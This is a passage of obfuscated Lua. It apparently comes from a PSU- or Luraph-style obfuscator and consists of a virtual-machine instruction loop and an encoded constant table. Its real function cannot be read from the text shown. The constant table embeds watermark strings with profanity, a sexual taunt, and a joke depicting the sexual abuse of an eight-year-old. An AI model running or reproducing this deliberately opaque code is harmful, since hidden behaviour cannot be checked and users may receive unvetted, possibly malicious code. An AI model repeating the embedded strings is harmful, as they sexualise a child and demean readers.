l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];e=e[n];elseif(i<=58)then l[e[o]]=#l[e[a]];end;elseif(i>59)then l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];e=e[n];elseif(i<60)then local n=e[o];l[n](d(l,n+1,e[a]));for e=n+1,r do l[e]=nil;end;end;elseif(i<=62)then if(i==61)then l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];local i=e[o];l[i](d(l,i+1,e[a]));for e=i+1,r do l[e]=nil;end;e=e[n];l[e[o]]=c[e[a]];e=e[n];local i=e[o];l[i]=l[i]();e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];e=e[n];elseif(i<=62)then l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];e=e[n];end;elseif(i<=63)then l[e[o]]=y(e[a]);e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];e=e[n];elseif(i>64)then l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];e=e[n];elseif(i<65)then e=e[n];l[e[o]]=c[e[a]];e=e[n];local i=e[o];l[i]=l[i]();e=e[n];l[e[o]][e[a]]=e[t];e=e[n];l[e[o]]=c[e[a]];e=e[n];local i=e[o];l[i]=l[i]();e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]][e[a]]=l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]][e[a]]=e[t];e=e[n];l[e[o]]=c[e[a]];e=e[n];local i=e[o];l[i]=l[i]();e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]][e[a]]=e[t];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];e=e[n];end;end;end);end;return x(U(),{},E())(...);end)(({[(620512506)]=((8));[((720291931-#("LuraphDeobfuscator.zip (oh god DMCA incoming everyone hide)")))]=((14));[(955560713)]=(((678003536-#("you dumped constants by printing the deserializer??? ladies and gentlemen stand clear we have a genius in the building."))));[(727690609)]=(((#{}+5000)));[((#{585;868;995;457;}+902530280))]=(((#{471;895;(function(...)return...;end)()}+65534)));[(886124452)]=((1));['p7onP2D']=((306566));[(340156807)]=(((112-#("woooow u hooked an opcode, congratulations~ now suck my cock"))));[((489530698-#("LuraphDeobfuscator.zip (oh god DMCA incoming everyone hide)")))]=((31));[(895699164)]=(((#{754;954;816;654;(function(...)return 251;end)()}-2)));[((#{403;685;772;551;(function(...)return 446,...;end)(201)}+525805644))]=("\108");[((#{412;454;527;88;}+539414643))]=(((#{141;945;136;}+773726758)));[((#{440;497;}+388064669))]=(((2087-#("still waiting for luci to fix the API :|"))));[(215745372)]=((248));[((#{387;426;40;996;(function(...)return 422,543,389;end)()}+491889171))]=((154359772));[((154359799-#("IIiIIiillIiiIIIiiii :troll:")))]=("\35");[((#{}+10649176))]=("\104");[((#{505;225;}+678003415))]=("\111");['dEEDk3X']=((918645849));["CFctyScX"]=(((327-#("why the fuck would we sell a deobfuscator for a product we created....."))));[((975693343-#("woooow u hooked an opcode, congratulations~ now suck my cock")))]=("\118");[(455354403)]=(((#{96;962;}+41)));[(93164179)]=((90));[((872286325-#("psu == femboy hangout")))]=(((#{}+199093464)));[(199093464)]=("\112");[(406310584)]=(((#{191;(function(...)return 458;end)()}+18)));[(988549808)]=((315645039));["rWkhsbT4"]=(((525805665-#("concat was here"))));cQeQmE=((77));[((#{977;257;}+315645037))]=("\101");[(934592728)]=("\117");["VZWLWBI"]=("\107");[((#{(function(...)return 627,...;end)(944,391)}+602116986))]=(((#{(function(...)return;end)()}+1023)));[(616705821)]=(((34-#("IIiIIiillIiiIIIiiii :troll:"))));['WgImlIJL']=("\100");["qFrpdOQZ"]=(((#{240;219;(function(...)return;end)()}+80758712)));[((#{116;212;127;}+434348740))]=(((919791-#("PSU|161027525v21222B11273172751L275102731327523d27f22I27f21o26o24Y21J1827F1X27f1r27F23823a26w1... oh wait"))));[(463025687)]=("\51");[((#{131;}+30375273))]=("\114");[(45078393)]=((36));[(454472801)]=(((30375352-#("luraph is now down until further notice for an emergency major security update"))));[((175407358-#("i am not wally stop asking me for wally hub support please fuck off")))]=((131433862));[((51171474-#("why the fuck would we sell a deobfuscator for a product we created.....")))]=(((#{402;623;462;369;}+187214134)));[((650820143-#("Luraph v12.6 has been released!: changed absolutely fucking nothing but donate to my patreon!")))]=(((10649197-#("psu == femboy hangout"))));[((986068825-#("you dumped constants by printing the deserializer??? ladies and gentlemen stand clear we have a genius in the building.")))]=((670282));[((671686183-#("you dumped constants by printing the deserializer??? ladies and gentlemen stand clear we have a genius in the building.")))]=(((669714362-#("psu == femboy hangout"))));[(866889091)]=(((301791-#("luraph is now down until further notice for an emergency major security update"))));[((#{854;929;273;767;}+110934433))]=("\110");[((350953857-#("I'm not ignoring you, my DMs are full. Can't DM me? Shoot me a email: mem@mem.rip (Business enquiries only)")))]=(((#{472;422;14;}+934592725)));[((#{961;111;(function(...)return 996,387;end)()}+80758710))]=("\121");[((#{447;871;}+505635133))]=(((654267-#("psu premium chads winning (only joe biden supporters use the free version)"))));[((#{197;(function(...)return 698;end)()}+440035270))]=(((#{261;(function(...)return;end)()}+110934436)));[(255160578)]=("\105");[((#{380;}+823405554))]=((871866));[((187214197-#("LuraphDeobfuscator.zip (oh god DMCA incoming everyone hide)")))]=("\116");[((918645971-#("oh Mr. Pools, thats a little close please dont touch me there... please Mr. Pools I am only eight years old please stop...")))]=("\109");["JJ6SnmA"]=((32));yv6ZqQ5en=(((#{722;588;768;(function(...)return 140,168,807;end)()}+29)));[((#{354;}+652623038))]=(((#{180;230;(function(...)return 906,888;end)()}+161)));[((#{363;816;(function(...)return 146;end)()}+391626263))]=(((894193740-#("Luraph v12.6 has been released!: changed absolutely fucking nothing but donate to my patreon!"))));['ENH07']=(((#{477;729;(function(...)return 43,773,...;end)(699,329)}+129)));[(539411858)]=((16777216));M1oBPFV=(((463025794-#("I'm not ignoring you, my DMs are full. Can't DM me? Shoot me a email: mem@mem.rip (Business enquiries only)"))));[((131433883-#("psu == femboy hangout")))]=("\98");['qylOX4eD2C']=("\119");[((724072559-#("guys someone play Among Us with memcorrupt he is so lonely :(")))]=((48));[(773726761)]=("\120");[((#{(function(...)return 697,...;end)()}+894193646))]=("\50");[(708892133)]=((2));[((#{}+571175245))]=(((#{346;564;418;}+3)));[(669714341)]=("\99");[((#{391;487;36;367;(function(...)return 522,390,837;end)()}+431830405))]=(((998680-#("IIiIIiillIiiIIIiiii :troll:"))));["nXanhn2"]=((975693283));[((#{126;360;522;707;}+493880711))]=(((81260428-#("this isn't krnl support you bonehead moron"))));[(81260386)]=("\97");l6hIfyS=(((#{521;659;474;531;}-4)));[(15319131)]=((5));[((#{934;622;166;}+340609863))]=((4));["Ik4Wr5lUeB"]=("\115");[(928567002)]=((21));[(312481133)]=(((#{62;298;}+255160576)));}),...) 2 | --------------------------------------------------------------------------------